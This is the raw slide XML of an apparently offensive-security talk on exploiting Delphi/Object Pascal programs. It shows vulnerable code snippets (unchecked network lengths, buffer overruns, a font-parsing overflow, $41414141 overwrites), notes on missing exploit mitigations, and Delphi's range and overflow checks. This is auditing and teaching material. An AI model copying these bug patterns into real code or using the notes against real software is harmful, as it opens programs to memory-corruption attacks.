              <a:t>LongWord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Ok            : Boolean;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  Connection := </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>NewClientSocket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>FHost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>FPort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Connection.ReadBuffer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DataLength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, 4);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>DataLength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=0 then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  begin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  end;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  Stream := </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>TMemoryStream.Create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try</a:t>
            </a:r>
          </a:p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Stream.Size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> := </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DataLength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> does an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>alloc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889844"/>
            <a:ext cx="7010400" cy="48013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procedure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>TTcpIp.ReadVar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Socket: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>TSocket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>;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Buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>; Size: Integer;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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Ok: Integer);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TempBuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Pointer;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  Error: Integer;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TempBuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> := nil;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  try </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> exception handling fun</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    if @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = nil then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GetMem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TempBuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Size)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> could throw an exception</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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  finally</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    if @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = nil then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean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FreeMem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TempBuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Size) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> free(NULL)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  end;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539889"/>
            <a:ext cx="7010400" cy="5632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err="1" smtClean="0"/>
              <a:t>RecvBuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> : array[1..$4000] of Char;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procedure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>TFinger.RecvData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rc,i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> : Integer;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  Finished : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>boolean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:=1;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FillChar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(RecvBuf,$4000,0);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repeat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TimerOn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rc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Winsock.recv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>FingerSocket,@RecvBuf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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$4000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>,0);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TimerOff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Finished:=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>TimedOut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=0) or (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=SOCKET_ERROR)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>              or Canceled;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Inc(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i,rc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dirty="0" smtClean="0"/>
              <a:t>  until Finished; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> busted loop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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76200"/>
            <a:ext cx="8382000" cy="67403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const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MaxChars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    = 255;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type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THeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = record</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    Signature: Char;</a:t>
            </a:r>
          </a:p>
          <a:p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NrChars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Integer;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  end;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TOffsetTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = array[0..MaxChars] of Integer;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...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>       with Fonts^[Font] do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>         begin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>         Move(Hp[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> + 1], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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TFHeader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         Read(f, Header,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THeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>), 0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>         Read(f, Offsets[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Header.FirstChar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>],</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/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Header.NrChars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* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SizeOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Integer), 0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>         Read(f, Widths[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Header.FirstChar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>],</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/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Header.NrChars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* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SizeOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Byte), 0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>         end;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Delphi has some possible mitigations </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>These are compiler directives </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Given in comments </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>They looks like: {$&lt;directive&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(s)&gt;}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Mitigations: Range-Checking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386840"/>
          <a:ext cx="7391400" cy="1737360"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2734818"/>
                <a:gridCol w="4656582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Type</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>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Switch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Syntax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>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{$R+} or {$R-}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{$</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>RANGECHECKS ON} or {$RANGECHECKS OFF}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Default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{$R-} {$RANGECHECKS OFF}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Scope</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>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Remarks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$R directive enables or disables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generation of range-checking code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In the {$R+} state,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all array and string-indexing expressions are verified as being within the defined bounds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and all assignments to scalar and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subrange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variables are checked to be within range. If a range check fails, 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ERangeError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exception is raised (or the program is terminated if exception handling is not enabled).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Enabling range checking slows down your program and makes it somewhat larger.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2971800" y="6642556"/>
            <a:ext cx="6172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http://docs.embarcadero.com/products/rad_studio/delphiAndcpp2009/HelpUpdate2/EN/html/devcommon/compdirsrangechecking_xml.html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Mitigations: Range-Checking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only work when directly working with array, string, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When you use a pointer no range checking is done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Mitigations: Range-Checking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133600"/>
            <a:ext cx="6705600" cy="45243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{$R+}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>procedure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>toeter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var</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>  p: ^Integer;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>  numbers : array[1..5] of Integer;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>begin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>  p := @numbers;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Inc(p);Inc(p);Inc(p);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Inc(p);Inc(p);Inc(p);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>   p^ := $41414141;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>end;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2050"/>
            <a:ext cx="911352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Mitigations: Range-Checking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Frame 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5334000" y="2286000"/>
            <a:ext cx="685800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990600" y="6400800"/>
            <a:ext cx="685800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Delphi compiler compiles to native code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Language is stronger typed than c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But still very low level </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No implicit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>boundchecks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in the language* </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There are some in the string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>api’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ! 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SetLength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>() will throw exception on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Yes, is vulnerable </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Very c-like from auditing and exploitation point of view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199" y="6488668"/>
            <a:ext cx="2209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By default, see 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Mitigations: Overflow checking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539240"/>
          <a:ext cx="8686800" cy="1737360"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3040380"/>
                <a:gridCol w="564642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Type</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>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Switch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Syntax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>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{$Q+} or {$Q-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>}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/>
                        <a:t>{$OVERFLOWCHECKS ON} or {$OVERFLOWCHECKS OFF}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Default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{$Q-} {$OVERFLOWCHECKS OFF}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Scope</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>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 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35052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Remarks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$Q directive controls the generation of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overflow checking code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In the {$Q+} state,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certain integer arithmetic operations (+, -, *, Abs,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Sqr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Succ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Pred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, Inc, and Dec) are checked for overflow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The code for each of these integer arithmetic operations is followed by additional code that verifies that the result is within the supported range. If an overflow check fails, an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EIntOverflow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exception is raised (or the program is terminated if exception handling is not enabled).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$Q switch is usually used in conjunction with the $R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switch, which enables and disables the generation of range-checking code. Enabling overflow checking slows down your program and makes it somewhat larger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so use {$Q+} only for debugging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0" y="6642556"/>
            <a:ext cx="63246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http://docs.embarcadero.com/products/rad_studio/delphiAndcpp2009/HelpUpdate2/EN/html/devcommon/compdirsoverflowchecking_xml.html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Mitigations: Overflow checking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 doesn’t handle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>signedness</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> issues </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Doesn’t care about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> truncation either </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Handles Abs($80000000)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api’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> will have this on whether you want it or not (like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SetLength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>())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dirty="0" smtClean="0"/>
              <a:t>Delphi is not a ‘safe’ language, very much like c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most memory corruption bugs will occur when doing own memory management, using win32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>api’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, reading and parsing data </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> has some mitigations, but very few hard guarantees </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No exploit mitigation anywhere </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The 90’s called, they want their bugs back</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lots of broken </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>delphi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> code out there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can overflow in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>delphi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  if you put too much data in them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It’s really just like c </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There is no magic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There are no implicit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>boundchecks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example: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686800" cy="415498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TYPE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IntArray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array[1..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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of integer;</a:t>
            </a:r>
          </a:p>
          <a:p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procedure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toeter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 integer;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numbers :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IntArray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begin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for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:= 1 to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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do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numbers[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] := $41414141; </a:t>
            </a:r>
          </a:p>
          <a:p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end;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rame 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5791200" y="1447800"/>
            <a:ext cx="685800" cy="304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371600" y="6400800"/>
            <a:ext cx="609600" cy="228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Delphi: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Stacksmashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> are trivially exploitable </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Delphi compiler is very primitive (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>securitywise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padding (besides 4 byte alignment)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No stack cookies </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No SEH protection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aslr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> opt-in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No non-exec pages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3128</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>557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Exploiting delphi/Object pascal</vt:lpstr>
      <vt:lpstr>Who am I</vt:lpstr>
      <vt:lpstr>intro</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>delphi</vt:lpstr>
      <vt:lpstr>Delphi: Stack</vt:lpstr>
      <vt:lpstr>Delphi: Stack</vt:lpstr>
      <vt:lpstr>Slide 8</vt:lpstr>
      <vt:lpstr>Delphi: Stack</vt:lpstr>
      <vt:lpstr>Delphi: Stack</vt:lpstr>
      <vt:lpstr>Delphi stack: demo</vt:lpstr>
      <vt:lpstr>Delphi: heap</vt:lpstr>
      <vt:lpstr>Delphi: heap</vt:lpstr>
      <vt:lpstr>Delphi: heap</vt:lpstr>
      <vt:lpstr>Delphi: heap</vt:lpstr>
      <vt:lpstr>Delphi heap</vt:lpstr>
      <vt:lpstr>Delphi heap</vt:lpstr>
      <vt:lpstr>Delphi heap: special case 1</vt:lpstr>
      <vt:lpstr>Delphi heap: special case 1</vt:lpstr>
      <vt:lpstr>Delphi heap: special case 1</vt:lpstr>
      <vt:lpstr>Delphi heap: special case 1</vt:lpstr>
      <vt:lpstr>Delphi heap: special case 1</vt:lpstr>
      <vt:lpstr>Delphi: heap</vt:lpstr>
      <vt:lpstr>Delphi: heap</vt:lpstr>
      <vt:lpstr>Delphi: heap</vt:lpstr>
      <vt:lpstr>Delphi: heap</vt:lpstr>
      <vt:lpstr>Delphi: heap (demo)</vt:lpstr>
      <vt:lpstr>Delphi integer issues</vt:lpstr>
      <vt:lpstr>Delphi integer issues</vt:lpstr>
      <vt:lpstr>Delphi integer issues: Signed comparison</vt:lpstr>
      <vt:lpstr>Delphi integer issues: Signed comparison</vt:lpstr>
      <vt:lpstr>Delphi integer issues: Signed comparison</vt:lpstr>
      <vt:lpstr>Delphi string implementation</vt:lpstr>
      <vt:lpstr>Delphi string implementation</vt:lpstr>
      <vt:lpstr>Delphi string implementation</vt:lpstr>
      <vt:lpstr>Delphi string implementation</vt:lpstr>
      <vt:lpstr>Delphi: what to look for</vt:lpstr>
      <vt:lpstr>Delphi: what to look for</vt:lpstr>
      <vt:lpstr>Slide 39</vt:lpstr>
      <vt:lpstr>Slide 40</vt:lpstr>
      <vt:lpstr>Slide 41</vt:lpstr>
      <vt:lpstr>Slide 42</vt:lpstr>
      <vt:lpstr>Slide 43</vt:lpstr>
      <vt:lpstr>Slide 44</vt:lpstr>
      <vt:lpstr>Mitigations </vt:lpstr>
      <vt:lpstr>Mitigations: Range-Checking</vt:lpstr>
